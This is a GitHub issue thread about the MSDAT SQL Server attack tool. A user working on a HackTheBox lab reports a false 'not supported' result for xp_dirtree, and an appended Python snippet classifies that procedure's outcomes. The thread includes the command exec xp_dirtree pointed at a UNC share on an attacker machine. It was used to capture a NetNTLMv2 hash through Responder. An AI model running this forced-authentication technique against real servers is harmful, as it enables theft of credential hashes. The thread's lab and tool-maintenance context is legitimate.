quentinhardy / msdat

MSDAT: Microsoft SQL Database Attacking Tool

xp_dirtree Incorrect Result #14

Open Zamanry opened 1 year ago

Zamanry commented 1 year ago

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported: [image]

I used impacket-mssqlclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share', which successfully connected to my Responder instance, providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?

Zamanry commented 1 year ago

The machine does have a C:\. So permissions must be restricting the access.
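The check proposed in this issue, as an added example that is not part of the thread and not msdat's own code: it treats an empty result set as "the procedure executed" and only an SQL error as "not callable". `run_query`, `SqlError` and the sample backends are hypothetical stand-ins for a real driver; 229 and 2812 are SQL Server's error numbers for a denied EXECUTE permission and a missing stored procedure.

```python
from enum import Enum

class Probe(Enum):
    ROWS = "executed, rows returned"
    EMPTY = "executed, empty result set"
    DENIED = "EXECUTE permission denied"
    MISSING = "procedure not found"
    ERROR = "other SQL error"

class SqlError(Exception):
    """Hypothetical stand-in for a driver exception carrying the server's error number."""
    def __init__(self, number, message=""):
        super().__init__(message)
        self.number = number

# SQL Server error numbers: 229 = EXECUTE permission denied on an object,
# 2812 = could not find stored procedure.
BY_NUMBER = {229: Probe.DENIED, 2812: Probe.MISSING}

def classify_xp_dirtree(run_query, path="C:\\"):
    """Run xp_dirtree through run_query (hypothetical callable: SQL text in,
    list of rows out, SqlError on failure) and classify the outcome."""
    quoted = path.replace("'", "''")  # keep the path inside the T-SQL string literal
    try:
        rows = run_query(f"exec xp_dirtree '{quoted}'")
    except SqlError as exc:
        return BY_NUMBER.get(exc.number, Probe.ERROR)
    # No exception means the server ran the procedure. An empty list only says
    # that nothing was listed for this path, not that the procedure is unusable.
    return Probe.ROWS if rows else Probe.EMPTY

def is_callable(outcome):
    """The procedure counts as callable whenever it executed, rows or not."""
    return outcome in (Probe.ROWS, Probe.EMPTY)

# Constructed backends standing in for a live connection.
def empty_backend(sql):
    return []

def listing_backend(sql):
    return [("Windows", 1)]  # constructed row: (subdirectory, depth)

def denied_backend(sql):
    raise SqlError(229, "EXECUTE permission denied")

if __name__ == "__main__":
    for name, backend in (("empty", empty_backend), ("listing", listing_backend), ("denied", denied_backend)):
        outcome = classify_xp_dirtree(backend)
        print(f"{name:8} -> {outcome.value:28} callable={is_callable(outcome)}")
```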